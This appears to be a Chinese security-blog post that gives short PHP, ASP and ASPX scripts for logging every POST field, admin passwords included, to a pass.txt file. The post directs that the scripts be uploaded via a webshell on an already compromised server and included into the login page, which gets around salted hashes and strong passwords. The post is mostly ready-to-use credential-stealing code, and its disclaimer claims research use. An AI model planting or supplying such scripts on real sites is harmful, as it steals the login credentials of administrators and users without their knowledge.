写这些脚本主要是方便记录管理员的密码.
通常为 md5+salt 或者为 强密码 无法解密.
需要上传至 webshell.
脚本均已在本地测试成功.
在对应的 login 文件上 include 即可.
默认保存在同目录下的 pass.txt 记录所有 POST 变量
php
<?php
if (isset($_POST)){
$f = fopen('pass.txt','a+');
foreach ($_POST as $k=>$v){
fwrite($f,$k.':'.$v."\r\n");
}
fclose($f);
}
?>
asp
<%
dim fs,fname
set fs=Server.CreateObject("Scripting.FileSystemObject")
set fname=fs.OpenTextFile(server.mappath("pass.txt"),8,true)
For i = 1 To Request.Form.Count
fname.WriteLine(""&Request.Form.Key(i)&":" & Request.Form(Request.Form.Key(i)))
Next
fname.Close
set fname=nothing
set fs=nothing
%>
aspx
<%@ Page Language="Jscript"%>
<%@ import namespace="System.IO" %>
<%
var filepath = Server.MapPath("pass.txt");
var sw = new StreamWriter(filepath, true);
for (var i = 0;i<Request.Form.Count;i++){
sw.WriteLine(Request.Form.Keys[i].ToString() + ":" + Request.Form[i].ToString());
}
sw.Close();
%>
php 包含为 include 'config.php'.
asp 与 asp.net 为 <!-- #include file="config.aspx" -->.
- By:X1r0z[exp10it.cn]
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论